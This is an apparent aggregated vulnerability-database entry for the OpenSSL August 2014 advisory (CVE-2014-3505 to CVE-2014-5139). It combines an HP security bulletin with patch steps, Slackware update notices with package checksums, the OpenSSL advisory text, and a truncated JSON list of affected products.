Reference Base Vector Base Score CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-3513 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve this vulnerability.
Note: For HP Insight deployment Control server v7.1.2, v7.2.0, v7.2.1 and v7.2.2, you must upgrade to v7.3.1 and follow the steps from 1 to 11 mentioned below to resolve the vulnerability.
Delete the files smh.exe from Component Copy Location listed in the following table, rows 1 and 2. Delete the files vca.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7..rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-bd2042a1c7574aad90c4839efe smhamd64-cp023964.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-062078f1ae354b7e99c86c151c smhx86-cp023963.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-7b23e47d5d9b420b94bd1323eb vcax86 cp025295.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-2557aa7dc1654cf6b547c1a9e4 vcaamd64-cp025296.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-5827037475e44abab586463723 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components
\express\hpfeatures\hpagents-sles10-x64\components
\express\hpfeatures\hpagents-rhel5-x64\components
\express\hpfeatures\hpagents-rhel6-x64\components
6 http://www.hp.com/swpublishing/MTX-57ab6bb78b6e47a18718f44133 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components
\express\hpfeatures\hpagents-sles10-x64\components
\express\hpfeatures\hpagents-rhel5-x64\components
\express\hpfeatures\hpagents-rhel6-x64\components
7 http://www.hp.com/swpublishing/MTX-34bcab41ac7e4db299e3f5f2f1 smhx86-cp025274.exe \express\hpfeatures\hpagents-ws\components\Win2003
8 http://www.hp.com/swpublishing/MTX-00eb9ac82e86449e8c3ba101bd smhamd64-cp025275.exe \express\hpfeatures\hpagents-ws\components\Win2003
Download and extract the HP SUM component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p991570621/v99346
Copy all content from extracted folder and paste at \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on the target running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on the target running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on the target running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on the target running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 job on the target running Windows.
HISTORY Version:1 (rev.1) - 1 April 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlUb+3EACgkQ4B86/C0qfVnD1wCg+LtrJpQcATsjJ308tHP49nog 0sgAoJ5L9/aT7iAxhlnZdRatqjBoIFxb =pzE4 -----END PGP SIGNATURE----- .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. This update fixes several security issues: Double Free when processing DTLS packets (CVE-2014-3505) DTLS memory exhaustion (CVE-2014-3506) DTLS memory leak from zero-length fragments (CVE-2014-3507) Information leak in pretty printing functions (CVE-2014-3508) Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510) OpenSSL TLS protocol downgrade attack (CVE-2014-3511) SRP buffer overrun (CVE-2014-3512) Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) For more information, see: https://www.openssl.org/news/secadv_20140806.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139 ( Security fix ) patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
If a multithreaded client connects to a malicious server using a resumed session and the server sends an ec point format extension it could write up to 255 bytes to freed memory.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory exhaustion (CVE-2014-3506)
An attacker can force openssl to consume large amounts of memory whilst processing DTLS handshake messages. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory leak from zero-length fragments (CVE-2014-3507)
By sending carefully crafted DTLS packets an attacker could cause openssl to leak memory. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL TLS protocol downgrade attack (CVE-2014-3511)
A flaw in the OpenSSL SSL/TLS server code causes the server to negotiate TLS 1.0 instead of higher protocol versions when the ClientHello message is badly fragmented. This allows a man-in-the-middle attacker to force a downgrade to TLS 1.0 even if both the server and the client support a higher protocol version, by modifying the client's TLS records.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0212", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.34" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.4" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": 